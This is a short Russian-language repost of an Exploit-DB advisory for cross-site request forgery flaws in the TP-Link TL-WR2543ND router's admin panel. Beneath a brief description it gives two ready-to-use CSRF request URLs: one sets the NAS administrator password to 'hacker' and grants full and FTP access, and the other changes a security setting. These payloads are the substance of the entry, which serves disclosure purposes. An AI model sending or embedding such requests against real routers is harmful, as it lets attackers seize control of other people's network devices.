- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38308
- Проверка EDB
-
- Пройдено
- Автор
- JUAN MANUEL GARCIA
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- N/A
- Дата публикации
- 2013-02-08
TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/57877/info
TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests.
Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions.
TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.
http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save
http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save- Источник
- www.exploit-db.com
